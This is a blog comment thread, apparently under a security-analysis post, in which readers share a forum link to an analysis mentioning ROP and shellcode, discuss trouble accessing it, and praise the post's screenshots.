  4. pls see my analysis http://bbs.pediy.com/showthread.php?t=162493

    ReplyDelete
    Replies
    1. Lu, read it. Good work for the ROP & shellcode! Thank's for the advice & I'll adjust accordingly.

      Delete
    2. This analysis is forbidden for reading. How can I get it?

      Delete
    3. I didn't see any blocking from my side. Forbidden by whom? What/who forbid you to view?

      Delete
    4. Sorry for long time answer. First, write to me that need registration. When I registered: "you do not have permission to access this page..."

      Delete
    5. I have no idea, sorry. It is publicly open and shared.
      No restriction.

      Delete
  5. Woaaah, So much informative information!, love the screenshots, Great post!

    ReplyDelete